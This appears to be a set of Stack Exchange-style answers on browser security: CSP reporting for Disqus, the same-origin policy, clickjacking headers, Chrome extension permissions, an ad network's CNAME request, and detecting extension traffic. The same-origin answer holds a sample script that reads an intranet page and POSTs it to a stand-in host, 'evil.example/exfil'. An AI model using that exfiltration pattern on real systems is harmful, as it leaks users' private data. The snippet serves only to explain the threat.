Disqus only works when scripts fail Content Security Policy

I've been battling an intermittent issue with Disqus on a blog page. The issue has been difficult to pin down as it will work sporadically.
Managed to pin the issue down to this:
If the following scripts fail to load due to Content Security Policy then everything works fine and the iframe shows.
Adding the domain to the authorised domain list on Disqus allowed some progress, and the issue is now less common; however, it's still not perfect: refreshing the page will prevent the iframe loading, but refresh again and it appears!!
If anyone has any ideas how I can get this working properly it would be greatly appreciated.

From what it looks like, there are a few directives missing from your CSP exclusion list. I would suggest the following:
Use a tool like Report URI to report CSP violations on your domain. Report URI is a life saver; I'm speaking from experience.
If you are applying a CSP policy for the first time in your application, then start with Content-Security-Policy-Report-Only.
The HTTP Content-Security-Policy-Report-Only response header allows web developers to experiment with policies by monitoring (but not enforcing) their effects. These violation reports consist of JSON documents sent via an HTTP POST request to the specified URI.
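For reference, a violation report POSTed by the browser is a JSON document along these lines (values hypothetical, fields abbreviated):

    {
      "csp-report": {
        "document-uri": "https://example.com/blog",
        "violated-directive": "script-src",
        "blocked-uri": "https://c.disquscdn.com",
        "original-policy": "script-src 'self'; report-uri https://example.report-uri.com/r/d/csp/reportOnly"
      }
    }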
This is important because you cannot manually check for every violation. It is better to collect all the violations over a period of time and then make your CSP policy more restrictive.
Once you have confidence in your CSP policy, you can switch to enforcing it. However, ensure that you still report violations to Report URI or your own logging.
Much of this is trial and error, as you do not know what scripts your "trusted" third-party libraries are loading. You also cannot control whether their code or implementation changes under the hood. Hence, monitoring helps you continuously detect violations and take appropriate action.
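To make this concrete, here is a sketch of a report-only policy for a page embedding Disqus, sent as a single header line. The Disqus hosts listed are assumptions to be verified against your own violation reports, and the report-uri endpoint is a placeholder:

    Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' https://disqus.com https://*.disqus.com https://*.disquscdn.com; frame-src https://disqus.com; report-uri https://example.report-uri.com/r/d/csp/reportOnly

Once the reports stop flagging legitimate Disqus resources, the same value can be moved to the enforcing Content-Security-Policy header.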

Related

Why does the Same Origin Policy prevent reading GET responses?

I've done a bit of research on the web and searched through a few questions about SOP and what kinds of abuse it mitigates, but most answers are focused on preventing stolen credentials. This makes sense to me.
What doesn't make sense to me is why browsers following SOP rules block the response outright, rather than blocking cookie and local storage access.
In other words, if cookies and local storage didn't exist, would there still be a need to prevent reading GET responses? Presumably this is already what happens to some degree with <img>, <script>, and <iframe>.
According to the Mozilla Developer Network:
The same-origin policy restricts how a document or script loaded from one origin can interact with a resource from another origin. It is a critical security mechanism for isolating potentially malicious documents.
According to RFC 6454:
Although user agents group URIs into origins, not every resource in an origin carries the same authority (in the security sense of the word "authority", not in the [RFC3986] sense). For example, an image is passive content and, therefore, carries no authority, meaning the image has no access to the objects and resources available to its origin. By contrast, an HTML document carries the full authority of its origin, and scripts within (or imported into) the document can access every resource in its origin.
To answer your question: even if cookies and local storage didn't exist, it would still be dangerous to execute an unknown script in the context of the document. These scripts could issue XHR requests from the same origin (and the same client IP) as the authorized scripts and behave badly.
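To illustrate why, here is a sketch of the kind of cross-origin read that SOP blocks (all hosts hypothetical):

    // Script running on https://evil.example. Without SOP, the response
    // below would be readable even if no cookies existed, because the
    // request originates from the victim's machine and can reach hosts
    // (e.g. intranet servers) that the attacker cannot reach directly.
    fetch('https://intranet.corp.example/payroll')
      .then(response => response.text())
      .then(body => fetch('https://evil.example/exfil', {
        method: 'POST',
        body: body, // the leaked cross-origin response
      }));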

Is Frame-Options a standard, or only a draft with no schedule for approval?

OWASP has a page where they suggest using x-frame-options and frame-options to prevent clickjacking. The latter was defined as a draft a few years ago, but I cannot find any information on implementation or acceptance of this draft. Is it accepted, is it planned to be, or in other words, what is its status, and should we be adding it or only use x-frame-options for now?
Frame-Options is not a standard.
The new standard is to use CSP's frame-ancestors directive.
The frame-ancestors directive specifies valid parents that may embed a page using the <frame> and <iframe> elements. This directive is not supported in the <meta> element or by the Content-Security-Policy-Report-Only header field.
As this is a new standard (see browser support here), it is advised to also use X-Frame-Options in the meantime, while all the browsers your platform supports either catch up or fizzle out.
It is advised that the server responds with an X-Frame-Options header irrespective of whether or not the draft has been approved. I have pulled the following content from the Acunetix vulnerability description:
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.
My impression is that the draft is not standardized (at least at the time of this post) because X-Frame-Options is implemented differently across browsers, leading to unintended results and behavior; however, this is just my speculation and it could be for completely different reasons.
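In practice you send both headers side by side; a minimal sketch that only allows same-origin framing:

    Content-Security-Policy: frame-ancestors 'self'
    X-Frame-Options: SAMEORIGIN

Per the CSP2 draft, browsers that support frame-ancestors ignore X-Frame-Options when the directive is present; older browsers fall back to X-Frame-Options.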

Should I expect any issues if I want to communicate between a secure (https) website and a Chrome extension?

I have a Chrome extension that currently communicates with a website over http; what difficulties or problems could occur if I switch my website to https?
Communication is done using this method (chrome.runtime.sendMessage)
https://developer.chrome.com/extensions/messaging#external-webpage
And I also pull some iframe pages from the website.
As far as chrome.runtime messaging goes, Chrome does not care, as long as you have permissions.
And that might be your problem if you specified your match patterns as "http://example.com/*" instead of "*://example.com/*". Adding a permission for HTTPS if it wasn't there before may trigger a new permission warning, which is... unpleasant.
Triggering a new permission warning for an already-deployed extension means that the extension is automatically disabled after the update.
The user is then presented with a popup explaining that the extension was disabled because it requested more permissions than it had, asking the user to review them (or leave the extension disabled). You run the risk of users deciding not to bother, or misunderstanding the warning, thinking it's malware, and complaining.
Fortunately, "externally_connectable" match patterns do not trigger warnings - because such connections always have to be initiated by the page. If, however, you are also using a permission to do XHR, or a match pattern to inject a content script - the above applies.
You could potentially employ optional permissions to avoid this scenario, but that's a more complicated route.
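For illustration, the relevant manifest.json entries might look like this (the domain is a placeholder); using the "*://" scheme from the start covers both http and https, so a later switch needs no new permission grant:

    {
      "externally_connectable": {
        "matches": ["*://example.com/*"]
      },
      "permissions": ["*://example.com/*"]
    }

The "permissions" entry is only needed if you also do XHR against the site or inject content scripts; as noted above, "externally_connectable" alone does not trigger a permission warning.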

Cross-site scripting vulnerability because of a CNAME entry

One of our advertising networks for a site I administer and develop is requesting the following:
We have been working on increasing performance on XXXX.com and our team feels that if we can set up the following CNAME on that domain it will help increase rates:
    srv.XXXX.com    CNAME    d2xf3n3fltc6dl.XXXX.net
Could you create this record with your domain registrar? The reason we need you to create this CNAME is to preserve domain transparency within our RTB. Once we get this setup I will make some modifications in your account that should have some great results.
Would this not open up our site to cross-site scripting vulnerabilities? Wouldn't malicious code be able to masquerade as coming from our site to bypass same-origin policy protection in browsers? I questioned him on this and this was his response:
First off let me address the benefits. The reason we would like you to create this CNAME is to increase domain transparency within our RTB. Many times when ads are fired, JS is used to scrape the URL and pass it to the buyer. We have found this method to be inefficient because sometimes the domain information does not reach the market place. This causes an impression (or hit) to show up as “uncategorized” rather than as “XXXX.com”, and this results in lower rates because buyers pay up to 80% less for uncategorized inventory. By creating the CNAME we are ensuring that your domain shows up 100% of the time, and we usually see CPM and revenue increases of 15-40% as a result.
I am sure you are asking yourself why other ad networks don’t do this. The reason is that this is not a very scalable solution, because as you can see, we have to work with each publisher to get this setup. Unlike big box providers like Adsense and Lijit, OURCOMPANY is focused on maximizing revenue for a smaller amount of quality publishers, rather than just getting our tags live on as many sites as possible. We take the time and effort to offer these kinds of solutions to maximize revenue for all parties.
In terms of security risks, they are minimal to none. You will simply be pointing a subdomain of XXXX.com to our ad creative server. We can’t use this to run scripts on your site, or access your site in any way.
Adding the CNAME is entirely up to you. We will still work our hardest to get the best rates possible, with or without that. We have just seen great results with this for other publishers, so I thought that I would reach out and see if it was something you were interested in.
This whole situation raised red flags with me but is really outside of my knowledge of security. Can anyone offer any insight to this please?
This would enable cookies set at the XXXX.com level to be read by each site, but it would not allow other Same Origin Policy actions unless both sites opt in. Both sites would have to set document.domain = 'XXXX.com'; in client-side script to allow access to both domains.
From MDN:
Mozilla distinguishes a document.domain property that has never been set from one explicitly set to the same domain as the document's URL, even though the property returns the same value in both cases. One document is allowed to access another if they have both set document.domain to the same value, indicating their intent to cooperate, or neither has set document.domain and the domains in the URLs are the same. Were it not for this special policy, every site would be subject to XSS from its subdomains (for example, https://bugzilla.mozilla.org could be attacked by bug attachments on https://bug*.bugzilla.mozilla.org).
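As a sketch of that mutual opt-in (hostnames follow the question's redacted XXXX.com placeholder):

    // On a page served from https://www.XXXX.com (the main site):
    document.domain = 'XXXX.com';

    // On a page served from https://srv.XXXX.com (the CNAME'd ad host):
    document.domain = 'XXXX.com';

    // Only once BOTH documents have opted in can script in one frame
    // reach into the other's DOM; the CNAME by itself grants no such
    // access, which is the point made above.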

Identifying requests made by Chrome extensions?

I have a web application that has some pretty intuitive URLs, so people have written some Chrome extensions that use these URLs to make requests to our servers. Unfortunately, these extensions cause problems for us, hammering our servers, issuing malformed requests, etc., so we are trying to figure out how to block them, or at least make it difficult to craft requests to our servers to dissuade these extensions from being used (we provide an API they should use instead).
We've tried adding some custom headers to requests and junk-json-preamble to responses, but the extension authors have updated their code to match.
I'm not familiar with chrome extensions, so what sort of access to the host page do they have? Can they call JavaScript functions on the host page? Is there a special header the browser includes to distinguish between host-page requests and extension requests? Can the host page inspect the list of extensions and deny certain ones?
Some options we've considered are:
Rate-limiting QPS by user, but the problem is that not all queries are equal, and extensions typically kick off several expensive queries that look like user-entered queries.
Restricting the amount of server time a user can use, but the problem is that users might hit this limit just by navigating around or running expensive queries several times.
Adding static custom headers/response text, but they've updated their code to mimic ours.
Figuring out some sort of token (probably cryptographic in some way) we include in our requests that the extension can't easily guess. We minify/obfuscate our JS, so we are OK with embedding it in the JS source code (since the variable name it would have would be hard to guess).
I realize this may not be a 100% solvable problem, but we hope to either gain the upper hand in combating it, or make it sufficiently hard to scrape our UI that fewer people do it.
Welp, guess nobody knows. In the end we just sent a custom header and started tracking who wasn't sending it.
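A sketch of that approach (the header name, meta tag, and endpoint are all hypothetical):

    // In the page's own JS: the token is rendered into the page by the
    // server, so an extension crafting raw requests won't have it.
    const token = document.querySelector('meta[name="page-token"]').content;

    fetch('/api/search?q=example', {
      headers: { 'X-From-Our-UI': token },
    });

    // Server side: log requests that are missing (or fail to validate)
    // the header to identify extension-generated traffic.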
